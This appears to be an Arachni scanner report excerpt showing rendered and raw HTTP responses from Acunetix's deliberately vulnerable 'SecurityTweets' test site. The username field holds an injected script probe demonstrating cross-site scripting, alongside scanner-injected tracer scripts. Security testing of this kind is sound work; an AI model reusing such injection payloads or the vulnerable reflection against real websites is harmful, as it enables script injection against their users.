<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/services/itemsService.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://bxss.s3.amazonaws.com/ad.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 | <html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp" class="ng-scope" data-arachni-id="-1655945266"><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"username":{"stop_at_first":true,"trace":false},"admin":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href="http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" rel="stylesheet" type="text/css"> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> <style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak{display:none;}ng\:form{display:block;}</style></head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/" data-arachni-id="-59717636"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/" data-arachni-id="-1395254329">Acunetix Web Vulnerability Scanner</a>. </p> <p class="navbar-text pull-right"> Welcome <b> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </b> | <a href="/logout" data-arachni-id="-2013462102">Logout</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class="active"><a href="#/popular" data-arachni-id="1270713017">Popular</a></li> <li><a href="#/latest" data-arachni-id="-2026013785">Latest</a></li> <li><a href="#/carousel" data-arachni-id="67552640">Carousel</a></li> <li><a href="#/archive" data-arachni-id="916551842">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about" data-arachni-id="63058797">About</a></li> <li><a href="#/contact" data-arachni-id="-1678787584">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/" data-arachni-id="-1405978501">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/" data-arachni-id="166919624">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/" data-arachni-id="-1519928118">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/" data-arachni-id="2073538">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix" data-arachni-id="561774310">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/" data-arachni-id="748307027">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view=""><script src="http://javascript.browser.arachni/polyfills.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script class="ng-scope"> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <div id="loader" class="ng-scope" style="display: none;"> Loading ... <i class="icon-spinner icon-spin icon-2x pull-left"></i> </div> <div data-ng-include="'/static/app/partials/itemsList.html'" class="ng-scope"><script src="http://javascript.browser.arachni/polyfills.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script class="ng-scope"> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <div class="row-fluid ng-scope"> <div class="pull-left"> <input type="text" placeholder="Filter results" ng-model="searchText" class="ng-pristine ng-valid" data-arachni-id="0"> </div> <div class="pull-right"> <div ng-show="filter==''">Page <span ng-bind-html-unsafe="pageStr" style="font-weight: bold;" class="ng-binding">0</span> </div> </div> <div class="pull-right"> <div ng-show="filter!=''" style="display: none;">Filtering for host <b class="ng-binding"></b></div> </div> </div> <!-- ngRepeat: item in items | filter:filter | filter:searchText --><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://twitter.com/bradhoylman/status/991408461203279872" target="_blank" href="https://twitter.com/bradhoylman/status/991408461203279872" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/twitter.com" class="ng-binding" href="#/all/filter/twitter.com" data-arachni-id="-1830313082">twitter.com</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=696a3680438a7af53a0a54d3d26469bf" href="/like?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=696a3680438a7af53a0a54d3d26469bf" href="/comment?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=696a3680438a7af53a0a54d3d26469bf" href="/report?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://twitter.com/bradhoylman/status/991408461203279872" href="#/redir?url=https://twitter.com/bradhoylman/status/991408461203279872"><div class="detailsboxTitle ng-binding">Senator Brad Hoylman</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> We're glad to see New York introducing #NetNeutrality protections based on California's SB 822 <br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" target="_blank" href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/www.eff.org" class="ng-binding" href="#/all/filter/www.eff.org" data-arachni-id="-313525244">www.eff.org</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=6cc95ec82a3e1524115d692b9386d60a" href="/like?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=6cc95ec82a3e1524115d692b9386d60a" href="/comment?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=6cc95ec82a3e1524115d692b9386d60a" href="/report?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" href="#/redir?url=https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption"><div class="detailsboxTitle ng-binding">There is No Middle Ground on Encryption</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> The “middle ground” between what law enforcement agencies want—bad encryption—and what users want—good encryption—is still just bad encryption <br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://ssd.eff.org/en/module-categories/security-scenarios" target="_blank" href="https://ssd.eff.org/en/module-categories/security-scenarios" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/ssd.eff.org" class="ng-binding" href="#/all/filter/ssd.eff.org" data-arachni-id="-947703951">ssd.eff.org</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/like?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/comment?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/report?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://ssd.eff.org/en/module-categories/security-scenarios" href="#/redir?url=https://ssd.eff.org/en/module-categories/security-scenarios"><div class="detailsboxTitle ng-binding">Security Scenarios</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> Our Surveillance Self-Defense site has lessons for targeted groups like journalists and journalism students to be safer online without sacrificing access to information. <br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" target="_blank" href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/blog.github.com" class="ng-binding" href="#/all/filter/blog.github.com" data-arachni-id="1782715074">blog.github.com</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/like?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/comment?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/report?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" href="#/redir?url=https://blog.github.com/2018-05-01-github-pages-custom-domains-https/"><div class="detailsboxTitle ng-binding">Custom domains on GitHub Pages gain support for HTTPS</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/github" target="_blank" class="ng-binding" href="http://twitter.com/github" data-arachni-id="-279974877">@github</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/github" target="_blank" href="http://twitter.com/github" data-arachni-id="750470370"><b class="ng-binding">@github</b></a><br> Today, custom domains on GitHub Pages are gaining support for HTTPS via @letsencrypt. It's another step towards making the web more secure for everyone. <br><br> </div> </div> </div> </div> <ul class="pager ng-scope"> <li><a ng-href="#/popular/page/-1" ng-show="page>0" href="#/popular/page/-1" style="display: none;">Previous</a></li> <li><a ng-href="#/popular/page/1" ng-show="filter==''" href="#/popular/page/1" data-arachni-id="2424595">Next</a></li> </ul></div></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId">admin is coming from <b>unknown</b> and has visited this page <b>14</b> times.</div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body ng-pristine ng-valid" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><div class="fb-comments" data-num-posts="4" data-width="470" data-href="http://testhtml5.vulnweb.com/"></div> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><iframe name="ads_ads_frame" src="http://ads.bxss.me/ad_server.php?zone_id=234&ad_client=723898932&u_h=1080&u_w=1920&pn=&ref=&url=http://testhtml5.vulnweb.com/&" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" frameborder="0" height="1" scrolling="no" width="1" style="background-color:#FFFFFF;"></iframe> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body></html> |
This is the original HTTP response body.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 | <script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"username":{"stop_at_first":true,"trace":false},"admin":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <!DOCTYPE html> <html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp"> <head> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> </head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>. </p> <p class="navbar-text pull-right"> Welcome <b></script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </b> | <a href='/logout'>Logout</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class="active"><a href="#/popular">Popular</a></li> <li><a href="#/latest">Latest</a></li> <li><a href="#/carousel">Carousel</a></li> <li><a href="#/archive">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about">About</a></li> <li><a href="#/contact">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId"></div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" 